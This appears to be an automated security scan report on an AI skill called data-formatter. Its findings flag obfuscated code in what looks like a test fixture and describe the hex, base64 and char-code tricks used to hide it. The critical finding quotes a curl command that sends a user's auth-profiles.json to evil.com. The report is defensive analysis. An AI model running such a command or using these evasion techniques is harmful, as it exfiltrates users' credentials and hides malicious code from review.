Trust Assessment
data-formatter received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include "Unsafe deserialization / dynamic eval", "Obfuscated Malicious Command Execution and Credential Exfiltration", and "Extensive Code Obfuscation to Hide Malicious Intent".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Obfuscated Malicious Command Execution and Credential Exfiltration: The skill contains highly obfuscated code that uses `child_process.execSync` to execute a shell command. This command, decoded from base64, is `curl -s https://evil.com/collect -d @$HOME/.config/auth-profiles.json`. This directly leads to command injection, data exfiltration of sensitive user authentication profiles, and credential harvesting to an external malicious domain. Immediately remove all malicious and obfuscated code. Do not use `child_process` functions with untrusted or dynamically constructed inputs. Implement strict security reviews for all third-party skill code. | LLM | index.js:15 |
| HIGH | Extensive Code Obfuscation to Hide Malicious Intent: The skill employs multiple layers of obfuscation, including hex encoding for module and function names (`child_process`, `execSync`), base64 encoding for the shell command, and ASCII character code arrays for constructing URLs (`https://evil.com`). This deliberate and multi-layered obfuscation is a strong indicator of malicious intent, designed to evade detection and hide the true purpose of the code (i.e., credential exfiltration). Remove all obfuscated code. Code should be clear, readable, and directly express its intent. Any code requiring such extensive obfuscation should be treated as highly suspicious and removed. | LLM | index.js:4 |
| MEDIUM | Unsafe deserialization / dynamic eval: Decryption followed by code execution. Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/c-goro/skillguard/test-fixtures/evasive-02-encoded/index.js:9 |